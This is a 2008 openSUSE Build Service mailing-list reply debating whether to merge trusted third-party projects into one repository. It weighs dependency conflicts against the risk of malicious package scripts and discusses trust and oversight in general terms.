On Tue, Jul 29, 2008 at 11:50 AM, Adrian Schröter
So here's my suggestion. First, keep the three "levels of trust" we have now: 1 = factory, 2 = established category projects like network:telephony, Apache, etc., 3 = home:user projects.
Next, with each release of SUSE, create the normal SUSE distribution using level 1 stuff, but also create a new "3rd party distribution" containing the union of all level 2 projects, taken as a snapshot at release time. The "3rd party distribution" could be shipped as a separate set of ISO images and would also be hosted in a *single* online repository (called e.g., "openSUSE 10.3 3rdParty").
This would have basically two effects:
1) The repository would cause plenty of conflicts, because we allow by intention that packagers replace/update packages. It would cause a real dependency hell when installing any package in YaST.
Yes, that is a potential problem. However, why should package X exist in two different incarnations (not just _aggregate) in two different projects (not counting home:user projects)? It seems like the conflicts are caused by a separate underlying disorganization that should be fixed and has nothing to do with how you split up repos. Maybe I'm oversimplifying things?
2) everybody would be able to inject evil code to everybodys system. (you do not even need to install a specific package, you would always get the package with %post script sending your credit card credentials to someone else). So no one should ever add this repo ever, simply because it is a soo easy target that for sure plenty people will do it.
Seriously, I saw often enough code in configure scripts talk with online server and sending private data that I will never install software which is not trustable to some degree (or I have reviewed myself).
So... are you saying that projects like Apache and network:telephony are not to be trusted? Then hmm, OBS just became a lot less useful to the world. Yes I agree there must be some kind of oversight to prevent evil %post scripts. This is true of any open source project. Perhaps this is an argument for setting up OSC commit mailing lists (like SVN commit emails) for each OBS project, so other members of the project can monitor changes... ? In any case the trust question is an important one but is also a separate one: if you can't trust Apache and network:telephony together in one repository, then you can't trust them in two repositories either. Orthogonal question. So yes the trust equation needs to be figured out. But separate from that, a single unified repository would be a lot more convenient, trustworthy or not. -Archie -- Archie L. Cobbs --------------------------------------------------------------------- To unsubscribe, e-mail: opensuse-buildservice+unsubscribe@opensuse.org For additional commands, e-mail: opensuse-buildservice+help@opensuse.org